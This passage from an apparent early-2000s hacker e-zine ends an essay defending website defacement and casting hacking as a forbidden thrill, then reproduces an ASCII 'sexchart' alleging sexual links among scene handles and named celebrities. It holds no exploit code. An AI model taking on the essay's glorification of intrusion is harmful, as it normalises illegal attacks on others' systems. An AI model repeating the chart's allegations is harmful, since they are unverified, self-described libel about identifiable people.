better infront of my friends. Almost anyone can find himself a remote exploit and run it
against the server. But not anyone can secure a Unix server, program or even make
html. For me defacing is just expressing my opinion on stuff, nothing more.
About 'fuck the ethics' thing. Mr. David, the ethics are here to prevent a major
chaos. Without ethics people would just go around and delete anything they run into.
I suggest every hacker to stick to the ethics as close as he can, hell, that's why they
were written. I know people forget about them, but there are always people like me
to remind hackers about the ethics. That's the balance. People don't stick to them,
they life stupid messages like "I 0wn3 j00". I tell You people, that's bad. Can't You
just write something. Anything, just not these stupid irritating messages. Ok, we
started another discussion here. "Who the hell are U to dictate what should be placed
on a defaced website?" - You say. Well, Your right. I'm nobody. I can't dictate what
should be placed on a defaced website. But I can suggest people not to do it. I just
suggested it, I didn't dictate or order it.
"The harder you try to hack the more aware we become as admins." - Aware ?! If
I deface Your site ten times, and don't tell You how I got in, You become more aware
!? I damage Your company for 10.000 $ by defacing it, because people say: "How can
they secure my server when they can't even secure their own." And nobody wants
Your service anymore. Don't get me wrong. I'm sure You're a very good and
experienced administrator, but nothing is secure enough, that hackers can't brake it.
That's what we devoted Our lives to, penetrating systems. I enjoy hacking. That
is really something unique. People through ages have always wanted to do something
that's forbidden or illegal. Just remind Yourself of Adam & Eve, and the Heaven
garden. Eve had to eat that apple alldo God gave them everything they needed, and
just forbid them to eat apples from that tree. Hacking is illegal in many countries. You
could get worse sentence for hacking than for murdering someone. I don't really care
if I get raided. Hacking is my crime. A crime out of passion. Respect me or hate me,
the choice is Yours.
- Peace out, slash
-
Shoutouts
- p4riah, LogError, zanith, v00d00, PHC, THC, attrition.org, net-security.org, ex1t,
sAs72, Cruciphux, HWA.hax0r.news, BHZ, SiRiUs, sLina, kLick_Mi, Emptyhead,
mosthated, pr1sm ,fuqraq, airWalk, [Princev], zeroeffect, and the whole BLN.
- Peace to my man whitecee, keep Youre head up. Peace to everyone who gave
support via email or IRC. I wish You a happy and a bug-free New Year.
Links...
- Attrition.org: Keep up the good work fellows
- HelpNet Security: The best news site on the net
- Black Lava Network: BLN for life !!!
Copyright © slash
Penetrating systems since 1998
@HWA
04.0 The hacker sex chart 2000
~~~~~~~~~~~~~~~~~~~~~~~~~
This was to be included in the last issue but attrition was down (only
source I know of that carries it) so here it is in its glory.
*********** WARNING: Explicit content **************************************
slander & libel -- the official computer scene sexchart
"that's none of your business!"
version 9.04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
for updates, additions, or to be put on the sexchart mailing list,
mail crank@ice.net.
to receive the latest version on efnet irc, "/msg lifelike sexchart".
a link is denoted by any sexual action between computer users that is
capable of spreading an std, from wet kissing on up.
the last .05 of revisions is listed at the bottom.
since the chart has grown so much, it's been extended in a strange way.
to preserve the 78 column width, there is now a secondary chart beneath
the first. people whose names appear between asterisks (*) in the first
chart also exist in the second.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
.--------- turin -------------------------------------.
| .----' | ||`---------------------------. |
toby | | |`----- keeper | |
.-|------|-|--------|---|-- intro -------|---------|------------.
| | .----|-|----- bjoe | | | | |
.-----|-|-|----|-|------------|-- brat acidqueene | |
| .---|-|-|----|-|------------|----|-----------|------|--|-----. |
| | | | | | `--. | | shorty | | | | |
angst | | | .--|-- reality ---|----|--|------ weedboy | | | |
|| |`--|-|-|-|--|--------------|----|--|--------|------|--|-----|----. |
|| `---|-|-|-' | | | | .------' | | | | |
|| .---|-|-|----|-- morgaine | | | | DJTrax | | | | |
|| | | | |.---|------|-------|-- lucky | | | llama | | |
|| | | | || | .-- thal ----' .----|-|--' potter | | | | |
|`-|-- oodles --|-|------------ styx --|-|--------|----|-|---. | | |
| | | | | | cerkit | | | | scat | | | | | |
| | .-' | vera | | .-|--|---|-|-----------|-|-|---|--|----|-|--.
| | | b3 | .' | skatin | | `--.| | dukeo | | | | | | | |
| | | `-----|-|--.`. | .---|-' || |.-' | | | blueeyes | | |
|.-|-|---------|-|--|-|-|-|---|----- evol! --- eerie | | | || | | | |
|| |.' | | | | | | ffej .--'|| || .-----|-' | | || dom | | |
|| || | | | | | | | | | .-'| |`--.| .-|---|-|--'| | | | |
|| || morph | | metalchic | | | | | || | | | |.--' carly | | |
|| || `----|-|---' | |`--|-|-|--|-|-- bF --' | 8ball ----'| | | |
|| || spacehog `.`. scuzz | | | | | `----|-----|---|-|---. xan | | |
|| |`-. `----|-|--. | `-|-|--|--. | | | | | | | |
|| | TH0M Y0RKE | | kurdt -|-----|-' | | `-----|-. | | beck | | |
|`.`. | `-. | `-----|---.| crimson | | | `---|----. | | |
`-|-|- collette `-. | `-- claud -|--.||.--' | | | nymph | | | |
.-|-|-------|-----|-|---------|--|- pip!@ --. | | | | | | | |
|.' | kablooie | | gumby | |.-'| || cancer | `-|----|---- beastie |
||.-' | | | | | | || | |`-. | | sample --' | |
||| mooer --' | | ladydeath | || | | iamjustme | | | |
||| || | | | | .--|----|--'| | | | | inuendo | |
||| || cardamon | | | | nitz | | | fatslayer .-|---' | | |
||| |`----------|-|-|-|-------|---|--|-----------|-' leesa hgirl | |
||| | tsoul .--' | | | sensei | littlestar | | | | | |
||| | | | | | | .------' | fried dcheese ----' |
||| | demon | aoxomoxoa --|-- poppie .----------' | | |
||| | | `----. | `-. | | | alecks abacab | wishchld |
||| `-- ostrich --|-|-. | | donnie | |.-------' | |
||`---------|-----|-|-|-|--|----' | || atropos assamite | dka |
|| jellyb | | | | | .---|-.|| |.--------' | | |
|`. | | | | | gilmore | baital .-- novicane .--' katester |
| | michelle_ .---|-|-|-|--|----|-----|--'| | | | .---' |
| | | | | | | | | crayon | pol | | TOXiC79 | | _evol_ |
| | abraxas | | | | | | .----|-|-|----------' | | |
| | | | | | | | vritra --|-|---.| | |.- bonita80 | shroomy69 |
| | mercuri | | | | | `---------.|.' || | ||.----------' | | |
| | | `---|-|-|-|-- nerkles |||.-- GoNINzo! ------ september | | |
| | lori | | | `-----------.|||| | ||`----------|------|-' | |
| | | | | | mona ||||| dazey |`----- ambigu0us --|---' |
| | skooter nic | | | | ||||| | | | | vocks |
| | | | | | | grimwater -.||||| NightMyst | | |
| | sita -- ninja | | | |||||| | marcus666 |
| | .---'| `-.| | | path0s --.||||||.-- turbo -- ivy256 | |
| | jules ziggy || | | |||||||| | dannyman |
| | || || | | photochic ||||||||.-- holden -- syn | | |
| | krampus --'| || | | | ||||||||| | christy |
| | | || | | spirit --.||||||||| lucifuge yumas | | |
| | indpuck --' || | | | ||||||||||.-' | .'.-- kkrazy |
| | .--'| | `----|---- crank!@#@%! ------ jamesy --|-|-------. |
| | all-of-nitco | `-----.| | | || | bex | | | .- LCN |
| `-. | `-----. || | | |`-|-----|--------|---|-|---|---.| |
`-. | fishhead hawk | |`-. | | | | .---|--------|---' | | || |
| | | | | | | | | `--|-|-- puck --- kinessa --|--.|| |
| | tamago | darwin | | | | | | | .--' | ||| |
.-|-|-----|---|----|----|-|--|---|---|----|-' | .-----------------' ||| |
| | | art | | `-- kaia -|---|---|---.| | | graywolf jakey ||| |
| | | | |.--|--------' `-. | | | || `--|-------.| .---' ||| |
| | | seaya `---- fawn --|-|---|---|-- mogel --|------ pixy -------.||| |
| | | | .---|---|-|---|---|----' || `-----. | |`------. |||| |
| | | slug grlfrmars `-. | | | `----. |`-------. | | `------.| |||| |
| | | | | | | | | `------. | nykia | | | turtle || |||| |
| | | kev-man | wildcard | `-|---------.| `--. | | | | || |||| |
| | `---------|----------|---|--------.|| hateball | | | jook || |||| |
| `. spectacle `---|-------.||| .-----|-|-' | | || |||| |
|.-|-------------------------|------ murmur -|-----|-|---' | ogre || |||| |
|| | | || ||`--|-----|-|-----|--|-. || |||| |
|| | .-----------|-------'| |`---|----.| | peggy | || |||| |
|| | Guitarzan --|-. CapnRat | | | | || | | | || |||| |
|| | .--|-|---|-----|- keroppi | .--|-- page! -- ghort | || |||| |
|| | crash313 | | | bond `--. | | | | .'| | | | | || |||| |
|| |.---|-----|--|-|----|-------|-|-----|-|--|--|-|--|----' | | || |||| |
|| || windx --|--|-' | .----|-'.----' | | | | | | | || |||| |
|| ||.-'|.----'.-|------|--|----|--|------' | | |.-|------' | || |||| |
|| ||| || | | | |.---|--|--. | | || | dedboy | || |||| |
|| ||| || .---' | hitchcock --|--|--|------|--' || | | | | || |||| |
|| ||| || | | | | | | | | .' larissa | .'| | | glynis || |||| |
|| ||| || | .--|--|-|-|-|-|---|-|--. | | | | | || |||| |
|| ||| || | | | | | | | | | | AnonGirl | | | | | Juliette || |||| |
|| ||| || | | | | | | | | | | | | .-|-|-|-' | || |||| |
|| ||| swisspope | | | | | | | | Medusa --|-|-|-|-|---- PrimeX || |||| |
|| |||.-' ||`--|--|-|-|-|-|---|-|----------|-|-|-|-|------------'| |||| |
|| |||| || | | | | | | | | cinnabon | | | | | Fiyaball | |||| |
|| |||| |`---|--|-|-|-|-|---|-|--|-----. `-|-|-|-|----------|-.| |||| |
|| ||||.--- piglet -' | | | `---|-|--|-----|-. | | | | | || |||| |
|| ||||| `----|-|-|-----|-|--|-----|-|-|-|-' | | || |||| |
|| ||||| pie -- bor | | | .---' | | .-|-|-|-|---|-- Quarex | || |||| |
|| ||||| | | | | | .---' | | | | | |.--' | | || |||| |
|| ||||| lankan --|-|-|-|-|- sweeney | | | | || RaggedyAnne | || |||| |
|| ||||`----. | | | | | | | | | | || | | | || |||| |
|| |||`---. | | | | | | toasty --' | | | || | `-.| || |||| |
|| ||`----|-|- PoGo .-' | `-|-|------. | | | || PointBlank || || |||| |
|| waar | | | |.--|---' `----. | | | | |`-. | || || |||| |
|| || | | | | || | .----|-|-----|-|-|-|--|--- hylonome || |||| |
|| || | .-|-|- hillary -|-----|----|-|-----|-|-|-|--|------------.|| |||| |
|| || | | | | | | |`--|- ideaman | | | | | | | dr0ne ||| |||| |
|| || `-|-|-|---|-|-|---|----------|-|-----|-|-|-|- ryu ---.| ||| |||| |
|| || .-|-|-|---' | `---|-- Fowlez | | | | | | .'| carrie ||| |||| |
|| || | | | `-----|-----|--. | | | | | | | | | ||| |||| |
|| |`-|-|-|-- severino | RottenZ -|-|-----|-|-|-' | | nuprinboy ||| |||| |
|| | | | | | | | | || | | | | | | | | ||| |||| |
|| | .' | | laurak -----' | | |`--|-|---- narya --' | redfox ||| |||| |
|| | | | | | `--------' | `--.| | | | ||| |||| |
|| | | `-|-|-- Dravanavin poto || | djbump feival --. ||| |||| |
|| | | `-|--------------------.|| |.--' | ||| |||| |
|| | | kyst | renen -------- jamming roller ||| |||| |
|| | `---|--|---- fritz clinto | seth -------------------'|| |||| |
|| `--- SiN13 --------|---|--------' | | .------------------'| |||| |
|`--. `--------- tracy -------------' | | trep |||| |
| .-|--------------------------------------|---' $t.andrew | |||| |
| | | GWEN STEPHANI SARA GILBERT candyrain | | tart |||| |
| | | | | | fatima --' | |||| |
| | | BILLY C0RGAN GAVIN R0SSDALE DREW BARRYM0RE | |.--------' |||| |
| | | `---. | | | ||.---------'||| |
| | | ED N0RT0N -- C0URTNEY L0VE -----' mysl minstrelle |||.---------'|| |
| | | .----' | | | `-----.||||.---------'| |
| | | KURT C0BAIN TRENT REZN0R -- tammy `----|------.||||||.---------' |
| | | | | |`-------|--- *gweeds@!#* -------. |
| | | MARY L0RD T0RI AM0S JELL0 BIAFRA | .---'||| |||`--------.| |
| | | | | .--'|| ||`--------.|| |
| | |.----- trilobyte --- Schquimpy freqout --|-|-|---'| |`--------.||| |
| | || | | | | | | | .' WL |||| |
| | || chinagirl amos -- EddieV `-- Nex | | | | | |||| |
| | || .------------|-------' | | | | dave_rast |||| |
| | sonia ------- velcro agentorange moonlyte | | | | |||| |
| | | | |`----. `----. | | | | | | lemson |||| |
| | | | sate plexus | savvy neko --' | | | | | |||| |
| | | | | | | .-'| | .-|-|-|-- whoops |||| |
| | | gage `-- rabidchild kirshana | Katia | | | | || |||| |
| | | | | | | | | | jess |`-- nyar |||| |
| | argent fate beaker | gnarf Sylvie | | | | | | |||| |
| | .-----------|---|-----|------------------' | | andrew | skora |||| |
| | | fuaim sedrick | | | | |||| |
| | | anathema .----------------------|-|----|---' |||| |
`-|--|-|-----------------|-. .------------------' | mswicked |||| |
| | | nadyalec erise | | | .--------- duatra -' .-------------'||| |
.-|--' | | .--' | | | | | timbrel | | ||| |
| | riotboi tao puff | | | | | | |.-- nineve | random-tox ||| |
| | `-----. | | | | | | .-- corp! ----------' | .----'|| |
| `- tanadept XunilOS | | | | | | | |||| silicosis -- espidre ---.|| |
| | ||`-----. | | | | | | | | |||| | ||| |
| siren |`---. skywind | | | | | | |||| mudge -- shewolf -- iskra ||| |
| | `-. | | | | | | | |||| | ||| |
| kingtrent | cbnoonan --|-|-|-|-|-|---'||| r2 -- mujahadin level6 ||| |
| `------. | | | | | | | .'|| `---. `-.||| |
| lilindian | lex | | | | | | | || ssq teq -- vYrus | sp0t |||| |
| | | | | | | | | | | || `-------------.| | | |||| |
| Goddess4u | lorah | | | | | | | |`. anarchist --. || | |.--'||| |
| | | | | | | | | | | | | | || | || ||| |
| .------ DrkSphere | | | | | | | | | | tymat -- *pinguino!##@#* ||| |
| | | || |`----|-|-|-|-|-|-|---|-|-|---|-------'|||||||||||| ||| |
| | CrazyLuna || | `.| | | | | | | | | gemmi |||||||||||| ||| |
| | .-'| meelah || | | | | | | | | |||||||||||| ||| |
| Sweetgal_ | | || | | | | | | | | barkode --'||||||||||| ||| |
| | Wi|dChild || | | | | | | | | ||||||||||| ||| |
| angeleyes .'| | | | | | | | | is0crazy ---'|||||||||| ||| |
| .--|-|-|-|-|-|-|---|-|-|--------------'||||||||| ||| |
| gersh | | | | | | | | | | r_avenger --'|||||||| ||| |
| aquis -----------|-|-|-|-|-|-|---|-|-|----------------'||||||| ||| |
| monkeygrl | | | | | | | | | | ter0daktyl --'|||||| ||| |
| skully ------|-------|-|-|-|-|-|-|---|-|-|------------------'||||| ||| |
| logicbox ----|-|-|-|-|-|-|---|-|-|-------------------'|||| ||| |
| | | | | | | | | | | *apok0lyps* ------'||| ||| |
| .------------------|-|-|-|-|-|-|---|-|-|-------|-------------'|| ||| |
|.--|-----------. .----|-|-|-' | | | | | | *kamira* .---'|.-'|| |
|| | | | | | | | | | | | | | || || |
||.-|--------- sarlo --|-|-|---|-' | | | | ao -. quisling tsk .-'| .'| |
||| p3nny |||`---|-|-|---|--.| | | | | | .-------|---|--|-|-|-'
||| | ||| | | | | niala | | | wintarose | .-' | | |
||| sari ||`----|-|-|-. | | | | | | | | | || | | .--' | |
||| | YYZ || | | | | | | laz | | | sinner | | |`. | | | kara |
||| *rage* | |`-----|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|----' |
||| | astraea ---|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|------'
||| rio | | | | | | `-|-----|-|-|--------|-|-|-|--|-|-|--------.
||| | | phz .-|-' `-|---|---. | | | .------|-|-|-|--' `-|-------.|
||| capone |.----|-|-----|---' | | | | | corwin | | `------|---. ||
||| asriel --|-|-----|-------|-|-|-|-|--------' valgamon | | ||
||| b0gus -----.| | | | timb0 | | | | | `--|---|--.||
||| .---- gita | | `. | | | | | | | | |||
||| drd00m | | | | minjo | | | | phone blueadept | | |||
||| veggie --|-|------|---|----|-|-|-|------|--|---------' | |||
||| | | | | | | | | .-- tele -- rambone `-.|||
||| .--- pickaxe --|-. | | | | | mrg | ||||
||`------------|----|-----|---|-|-|----|-|-|-|------' ||||
|| | |.----|---|-|-|----|-|-|-|-- xney3 --- fable -----.||||
|| | ||.---|---|-|-|----|-|-|-' | |||||
|| RoadRuner | |||.--|---|-|-|----|-|-|-- CosmicMJ schmoopie |||||
|| `--|---.|||| | | | | | | | | | | |||||
|| hayley | ||||| | | | | | | | arian vek -- sweeties | |||||
|| | | ||||| | | | | | | | | | | |||||
|| collision --|--.||||| | | | | | | | dj tamtam --- jonathan |||||
|| | |||||| | | | | | | | | | |||||
|| thoth | |||||| | | | | | | | discogurl -- candacep |||||
|| | | ||||||.-|---|-|-|----|-|-|------------------------. |||||
|| dpk arkuat | sQurl!#% | .-|-|-' | | | dwildstar phisher | |||||
|| | | | | ||||| | | | | | | | | | | |||||
|| _Melody_ --|-' ||||| | | | | | | | elek jimmie ----- boufa |||||
|| | | | ||||| | | | | | | | | | | `.|||||
|| atticus | | ||||| | | | | .--|-|-|- comstud MSofty --' | ||||||
|| | `--. ||||| | | | | lump | | | `--. Kanan ||||||
|| flashman --|-'|||| | | | | | | | | LarZ -- Tay ------' | ||||||
|| | .---|--'||| | | | | prae | | | | | | ||||||
|`. rezznor | .'|`-|-|-|-|------|-|-|-- Jon2 -' | | ||||||
| | | | | | | | | | | | | | | ||||||
| | marcus ---|--|-' | | | | | | | | TAYL0R HAWKINS | ||||||
| | `-----|--|----|-|-|-|------|-|-|--. | | | ||||||
| | | | | | | | | | | | | MINNIE DRIVER | ||||||
`-|-. | | | | | | | | | persis ---------------' ||||||
| | .---|--' | | | | | | | | `----- violator ---'|||||
|.' | supox --|-|-|-|-. | | | morkeleb ----------------'||||
|| spruance | `--. | | | `-|----|-|-|----------------------. ||||
|`-|--|-----|---------|-|-|-|--.|.---|-|-|---------------------.| ||||
.-|--' daria | zymotic | `.`-|- ark --|-|-|-- juniper --. || ||||
| | |.-----' | .' | | ||| | | | | | || ||||
| | cvk ----- cybele | .-|--|--'|`---|-|-|----|--. ivylotus || ||||
| | |`----. | | | | ceili | | | Zem | || ||||
| | hellenga | Lone-Wolf | `--|---. | | | | stillson || ||||
| | | | | | | |`-|----|---|----|-|-|-. `----. | || ||||
| | | regs | | miffy `--|----|- eris5 | | | | dudeman | | || ||||
| | | | | `-. | `--. | | | | | | | | `-- sumogirl || ||||
| | | | | | scottie | | | | | | | | `----. | | || ||||
`-|-|---|--|---|------------|-|--|-|-|-|-|-|-----.| Aleph | eighmi ||||
| | .-|--|---|- Wizzbane -|-|--' | | | | | || | | | | ||||
.-|-|-|-|--|---|------------|-|----' | | | | Kaleid ----|--|---.| ||||
| | | | `--|-. `--------. .-' | BLong | | | ||| |`--. | | bohr ||||
| | | | | ChromeLi --|-|---|--------|-|-|-----'|| | halfman | ||||
| | | | `------------|-|---|--. .--|-|-|------'| | | | ||||
| | | | flatlandr ---- aynn --|--|--|--|-|-|-------|-|---' Mythrandr ||||
| | `-|----------------.| | | O_Kei | | | | | ||||
| | micki -- rdrunner || lb | | | | | magneto God ||||
| | | || | iguana | | | Cones | | | ||||
| | | rhendrix -- dbt ---|----|---|-|-|-----|-' hope Tatyana | ||||
| | | | |.----|- pete0 | | | `-. |.----' | ||||
| | | konkers time ---|--------|-|-|----- Rasputin ---- nympho ||||
| | | .------------' `------. | | | | | | ||||
`-|- hagbard MandaPanda -- Doobie | | | | LadyViper | VampKitty ||||
.-' || | `--|-|-|-|--' | .-------------'|||
| m0kab3chu QueenBrocco ---'| ZobZ | | | | Iphigenia | |||
| `-----------..-------|------|-|-|-|-------------|--------------'||
| chickhabit ---.|| Persephone | | | `-----------. | ||
|.-----------------.||| `---|-|-|-- Stu | | afsaneh ||
|| AK47 --.|||| | | | | | | ||
|| .------------.||||| kubiak | | | .---------- sync gauss ||
|| | bfgrrl -- *meenk!@* ---' | | | | |.---' ||
|| | .----------'| | |`----. vlaad | | | | discodan --.|| aloke ||
|| | | nevre | fl00d | | | | | | ||| | ||
|| | | kaos .-----' teletype | | | | professor ||| | lgas ----.||
||.-|-|----|--|-------------|--|-----|-|-|-|---|-----.| ||| | | |||
|||.' | amity bumble --' AIDS .-|-|-|-|---|---- xgirl!@$ -|- deker |||
|||| | | | | | | | | | | .-'||| ||| | | | |||
|||| | style wmmr --|-- caitlin | | | | | | gwar ||| ||`-.| | `--.|||
|||| | | | | | | | | | | ||| || emilia ||||
|||| | coffeegrl .--|- The_Sock | | | | | | cg --'|| || | | | ||||
||||.-' | | .-'| | | | | | | | || || | | boto ||||
||||| nico Alucard | | | kitn | | | | | | dk ---'| || | | ||||
||||| | | | | | | | | | | | | | || | spig ||||
||||| anjee -- meethos | | | | | | | | | .-' swallow || | ||||
||||| | | | | `-|-|-|-|-|-|--. || `-- moose ||||
||||| METchiCK -|-' ^mindy^ | | | | | | ILUVJeNNA || ||||
||||| | ||||| | | | | | | | || ||||
||||| MrJuGGaLo ||||`--|- facedown | | | | | | || ||||
||||| |||`---|-----------|-|-|-|-|-|-- grimmy || ||||
||||| ||`----|-----------|-|-|-|-|-|-. || ||||
||||| phdave |`-----|- f_fisher | | | | | | deadapril || ||||
||||| | `------|-----------|-|-|-|-|-|-. || ||||
||||| Suzzeee dwymer -|-- Bruin | | | | | | supervixn || ||||
||||| `-------.| `--------. | | | | | | || ||||
||||| abbeycat --.|| NeuralizR | | | | | | | || ||||
||||| ||| | | | | | | | | || ||||
||||| lissa ||| Jen1 Briana | | | | | | || ||||
||||| `---.||| | .--'| | | | | | | | || ||||
||||| nyssa --- Wayhigh!@ | | | | | | | | || ||||
||||| .---' | ||| | | | | | | | | || ||||
||||| icy_girl | ||`---|-|---|-|-|-|-|-|-- allira |`---- adamw ||||
||||| | || | | | | | | | | .-' | || ||||
||||| etrigan meta4 |`----|-|---|-|-|-|-|-|-.| ryshask `--- loki |`.||||
||||| | | .-' | | | | |.' | ||.-' | | | |||||
||||| *am0eba* Suger | | | | | ||.-' ||| aries99 jazzy | | |||||
||||| | | | | | | | ||| ||| | | | |||||
||||| SWinder nettwerk | | | | ||| *tigerbeck* -- spacegirl |||||
||||| | .---|---' | | | ||| | | | | | | | |||||
||||| zeven tsal | romulen | | ||`-. | | | twichykat | | | |||||
||||| | .----------'| | |.------|-' |`. | | | | | | | | |||||
||||`--. `-|-- devious | | || `-. | | | | | soulvamp | | | |||||
|||`-. | | `-- phyzzix! -------|-|-|-' | | | | | |||||
|||.-|-|---|-- roman --'|| ||| | | | | timmerca | | | .'||||
||||.' | | | || ||| | | | `--. route | | | ||||
||||| | | emmanuel --'| ||| | | | .----|----------|---|-|-|-'|||
||||| | | | .-----' ||`--------|-|-|-|-. martyn ginny | | | |||
||||| | | philipw |`--. | | | | | .--------------|-|-|--'||
||||| | | | homeysan | | | | `--|-- BernieS | | | ||
||||| | | J0SH LAZIE | | .--|-|-|-|-. | .---------' | | ||
||||| `---|----|--------. | caffiend `.| | | | | | u4ea | ||
||||| | | riley | | || | | | | | krnl ---. | | ||
||||| .--- wikked | | | lordjello || | | | | | .-- missx ||
||||| | .--'||| | | | | | |`.| | | | | | | `. ||
||||| | | ||| Weasel | | | demented1 | || | | | | readwerd kc | ||
||||`-|-|-. ||| | .-|-|--|--' | | ||.' `--|----|-----------|--|-.||
|||| | | | ||`--. | | neal | hannah .--' ||| aliced | elizabeth | |||
|||| | | | |`-. | | | | | `--. .--|---.||| | | | | | | |||
|||| | | | | | | | | | | .---|--|--|--.||||.--' | | `-. deadlord | |||
|||| | | | | | | | | | | | `--|--|- ophie! ---|--|-. | | | | |||
||||.-|-|-|-|--|-|-|-|-|-|-|-- erikb | || | | .--' | | | | genders | |||
||||| | | | | | | | | | | | | | .'| | | | | | | | | |||
||||| | | | | | | | | | | joe630 | | | | | | | | | | `-- eppie | |||
||||| | | |.' | | `-|-|-|--|----.| | | | | | | .---|-|-|-----|---|--' |||
||||| | | || .-|-|---|-' `--|-. || | | | | | | | | | | primal bix |||
||||| | | || | | | tiffie --' | || | | | | | | | | | | |||
||||| | | || | | | | | || | | | | | | | | | | jasonf |||
||||| | | |`-|-|-|- X n0rmag3ne |`. | | | | | | | | | | | |||
||||| | | | .' | | | | | | | | | | | | | | | | .--- judy |||
||||| | | | | | `. | otopico `-|-|-|-|-|-|-|-|-|-- y-windows --------.|||
||||| | | | |.-|--|-' | | | | | | | | | | | | | ||||
||||| | | | || | | angelbaby --|-|-|-|-|-|-|-|-|---' | | ||||
||||| | | | || | | .----|-' | | | | | | | Moxie | | ThreeDays ||||
||||| | | | || | Jazzy1 dana --|-. | | | | | | | `--|-|-|--. | ||||
||||| | | | || | | | .---|-|-|-|-|-|-|-|-|-------|-|-' Slinky ||||
||||| | | | || `. | strat | .-|-|-|-|-|-|-|-|-' .----|-|---. | ||||
||||| | | | |`. | | | | | | | | | | | | Xavi .--|-|- BabyHuey ||||
||||| `-|-|-|-|-|-|--------. | | | | | | | | | | | || | | | | ||||
||||| `-|-|-|-|-|-- Ned -|-|-|-|-|-|-|-|-|-|-|-' || | | | rorrim | ||||
|||||.----' | | | | | `-|-|-|-|-|-|-|-|-|-|-. |`-|--|-|----|---|-.||||
||||||.-----' | | | Magenta | | | | | | | | | | | | | | | | | |||||
|||||||.------' | | | | | | | | | | | | | Taps | | | | | |||||
|||||||| .------' Lotus1 `-|-|-|-|-|-|-|-|-|-|-'||`-|--|-|- LamaKid |||||
|||||||| | | | | | | | | | | | | | || | | | | |||||
|||||||| | sunset | | | | | | | | | | | | || | | | | |||||
|||||||| | | | | | | | | | | | | | | | || | | | | |||||
|||||||| Mark kic | Cluey | | | | | | | | | | || | | | | |||||
|||||||`---.| | | | | | | | | | | | | || |.-' | | |||||
||||||`---.|| | Logre | | | | | | | | | | || ||.--' | |||||
|||||`-. ||`-------|--. | | | | | | | | | | | || ||| | |||||
||||| | *angieb* | | | | | | | | | | | | | || ||| SueVeneer | |||||
||||`-.| | .---' sunni -|-|-|-|-|-|-|-|-|-|--'| |||.--' | |||||
|||`-.|| | | .----|--|--' | | | | | | | | | Khat |||| JulieJul | |||||
||`. ||`-. | | | twi Opie | | | | | | | | | | .-'||| | | |||||
|| | |`. | | .-|-|--------|---' | | | | | | | | | Jai ||`--- Jag --|-'||||
|`-|-|-|-|-|--|-|-|----. rosefairy | | | | | | | | | | |`. ||| | ||||
|.-' | | | `--|-|-|---.| | | `-|-|-|-|-|-|-|-' | `-|-|----'|| `-.||||
||.--|-|-|----|-|-|-- b_!@@ dara | | | | | | | |.--' | .---'| |||||
|||.-' | | .--|-|-|--'|| | | | | | | | | | || .--' | GoodGirl |||||
||||.--|-|-|--' | | |
| | winmutt | | | | | | | || | |.----.| |||||
||||| | | | .-|-|---'| | | | | | | | | || | || || |||||
||||| | | | | | | | wolverine | | | | | | | || | Yummy Guyver |||||
|||||.-|-|-|--|-|-|----|-----------' | | | | | | || | |||| | |||||
||||||.' | | | | | | xyg shinex | | | | | | || | Rosie -'||| | |||||
||||||| | | | | | | | | `-|-|-|-|-|-. || | .-'|| | |||||
||||||| `-|--|-|-|-- *spyder_bytes* | | | | | | || | Rapunzle || | |||||
|||||||.---|--|-|-|----|---------------' | | | | | || | | || | |||||
||||||||.--' | `-|--. | CrakrMajk --|-|-|-|-|-'| | | Flame -'| | |||||
||||||||| | `. | | .------------|-|-|-|-|--|-|-|-|-------|-|-'||||
||||||||| phatgirl | `-|--. | lemony | | | | | | | | | Atomica | ||||
||||||||| | `--|-|-----|----. | | | | | | | | | | | ||||
||||||||| | | | Wizdom | | | | | | | | m00se | | ||||
||||||||| Twizzle | | | | .-|-|-|-|-|-|--|-|----------|--' ||||
||||||||| .--|------ ReelTime --' `-|-|-|-|-|-|-|--|-|--. Dolemite ||||
||||||||| | | .------'| | | | | | | | | | | | | ||||
||||||||| | | | Lullaby Sambrosia | | | | | | | | | nigel | QueenB ||||
||||||||| | | | | `---------. | | | | | | | | | `-------|-------.||||
||||||||| | | | | b|iss | | | | | | | | | | | |||||
||||||||| | | | RobertG .---|--|-|-' | | | | | | | | |||||
|||||||||.-|--|-|-----|-|-|- Mikey!# --|-|-|-|-|-|--|-------. Kyleel |||||
|||||||||| | `-|-----|-|-|--'| |||| | | | | | elektra | | |||||
|||||||||| | | | | | | |||`---|-|-|-|-|-|--|---. | RdKill |||||
|||||||||| | Zemora | Blondie ||`--. | | | | | | z1nk | | | |||||
|||||||||| | | .------|----|----'`-. | | | | | | | | AllyCat -. |||||
|||||||||| | `-|------|-- WanMan --|-|-|-|-|-|-|-|------|---' | | |||||
|||||||||| `---|------|----------. | | | | | | | misuse | .- Pbass | |||||
|||||||||| | Izzy `- Oscer --|-|-|-|-|-|-|-|--------|--|----' | |||||
|||||||||| | | | | | | | | | | | | | | MastElmo |||||
|||||||||| | | Brian-X Macc | | | | | | | | | `--.| | |||||
|||||||||| | | | | | | | | | | | | | `-- *Starr* | |||||
|||||||||| Maia!@% Bellez --|-' | | | | | | *B00bz* -----'| | | |||||
|||||||||| | ||`-------|----|---|-|-|-|-|-|--|-|------- Rig | | |||||
|||||||||| *Chef* |`------ Cidaq | | | | | | | | | .-------|--|-'||||
|||||||||| Breetai | | | | | | | | | | .--' | ||||
|||||||||| | `-. | | | | | | | luci | | Female ||||
|||||||||| Corn | NuConcept .---|-' | | | | | | | |`-|---.| | `.||||
|||||||||| | | | | `-. | | | | | | | | | *hydro311* |||||
|||||||||`--- lydia_atl PastaGal ---|-|-|-|-|-|--|-|-|--|--|----. .-'||||
||||||||| | | | `-|-|-|-|-|--|-' `--|--|-- Shad0w ||||
||||||||| Pnutgirl | GonzoLoco DrMonk | | | | | `------|--|--. ||||
||||||||| | | | | | | | | .-------' | SessyJen ||||
||||||||| LilDave -' CompChick Gemni | | | | | | splat ---|--' ||||
||||||||| | .---' | | | | | | | .-' Spastica ||||
||||||||`-- bluesxxgrl .--- DH | KL | | | | | | `---|----' | ||||
|||||||| | |.------|--' | | | | | | | CybrChrist ||||
|||||||| | redmare ||.- SN | .--' | | | | | `---. ||||
|||||||| | | |||.----|--|----|-|-' | phreaky VenusGirl ||||
|||||||`--. | tabas --.||||.---|--' .--|-|---' .-------------'|||
||||||`---|-|------------.|||||| | .--|--' | *magpie* | .------'||
|||||| .-|-' r0ach |||||||.--|-|--' | `--.| m0rg1 | yy[z] ||
|||||| | | | .--- n0elle!@ | | onkeld badger || | | | ||
|||||| | | albatross .--' | || | | | | | || ajx --|-- mo ||
